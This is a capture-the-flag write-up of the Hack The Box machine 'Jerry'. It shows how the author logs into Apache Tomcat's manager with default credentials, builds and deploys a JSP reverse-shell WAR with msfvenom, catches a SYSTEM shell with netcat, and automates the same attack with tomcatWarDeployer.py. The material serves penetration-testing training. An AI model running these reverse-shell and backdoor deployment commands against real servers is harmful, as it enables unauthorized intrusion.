HTB - Jerry
Getting Root:
Jerry is running
Apache Tomcaton port 8080Failed login error message shows default creds for the Host Manager App
We upload a reverse JSP shell
We get system on the box and both flags under the same directory
Tools Used:
nmap, msfvenon, tomcatWarDeployer.py
Nmap
nmap -sC -sV -p- -oA nmap/Jerry 10.10.10.95
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-01 22:54 EST
Nmap scan report for 10.10.10.95
Host is up (0.041s latency).
Not shown: 65534 filtered ports
PORT STATE SERVICE VERSION
8080/tcp open http Apache Tomcat/Coyote JSP engine 1.1
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1
|_http-title: Apache Tomcat/7.0.88
Port 8080 Apache Tomcat
Default credentials are shown when we fail to authenticate with admin:admin on the Host Manager App user: tomcat password: s3cret
Generate and upload a JSP Reverse Shell
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.20 LPORT=9001 -f war > shell.war
Getting the shell
rlwrap nc -lnvp 9001
listening on [any] 9001 ...
connect to [10.10.14.20] from (UNKNOWN) [10.10.10.95] 49192
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\apache-tomcat-7.0.88>whoami
whoami
nt authority\system
C:\apache-tomcat-7.0.88>systeminfo
systeminfo
Host Name: JERRY
OS Name: Microsoft Windows Server 2012 R2 Standard
OS Version: 6.3.9600 N/A Build 9600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00252-00112-46014-AA570
Original Install Date: 6/18/2018, 11:30:45 PM
System Boot Time: 3/2/2020, 12:55:40 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: x64-based PC
Processor(s): 1 Processor(s) Installed.
[01]: AMD64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC+02:00) Athens, Bucharest
Total Physical Memory: 4,095 MB
Available Physical Memory: 3,393 MB
Virtual Memory: Max Size: 4,799 MB
Virtual Memory: Available: 4,064 MB
Virtual Memory: In Use: 735 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Flags
Both flags are under the same directory
Directory of C:\Users\Administrator\Desktop\flags
06/19/2018 06:09 AM <DIR> .
06/19/2018 06:09 AM <DIR> ..
06/19/2018 06:11 AM 88 2 for the price of 1.txt
1 File(s) 88 bytes
2 Dir(s) 27,577,974,784 bytes free
C:\Users\Administrator\Desktop\flags>
Automating the Exploit
Using an automated tool from github written by mgeeky https://github.com/mgeeky/tomcatWarDeployer
./tomcatWarDeployer.py -U tomcat -P s3cret -H 10.10.14.20 -p 9001 10.10.10.95:8080
tomcatWarDeployer (v. 0.5.2)
Apache Tomcat auto WAR deployment & launching tool
Mariusz B. / MGeeky '16-18
Penetration Testing utility aiming at presenting danger of leaving Tomcat misconfigured.
INFO: Reverse shell will connect to: 10.10.14.20:9001.
INFO: Apache Tomcat/7.0.88 Manager Application reached & validated.
INFO: At: "http://10.10.10.95:8080/manager"
INFO: It looks that the application with specified name "jsp_app" has not been deployed yet.
INFO: WAR DEPLOYED! Invoking it...
INFO: ------------------------------------------------------------
INFO: JSP Backdoor up & running on http://10.10.10.95:8080/jsp_app/
INFO:
Happy pwning. Here take that password for web shell: 'sCNUCUbpUYCt'
INFO: ------------------------------------------------------------
INFO: Connected with: nt authority\system@JERRY
C:\apache-tomcat-7.0.88> whoami /all
USER INFORMATION
----------------
User Name SID
=================== ========
nt authority\system S-1-5-18
According to the wiki, this tool has been tested with the following versions:
TESTED
Apache Tomcat/5.5.35
Apache Tomcat/6.?
Apache Tomcat/7.0.52
Apache Tomcat/7.0.56
Apache Tomcat/8.0.33
Last updated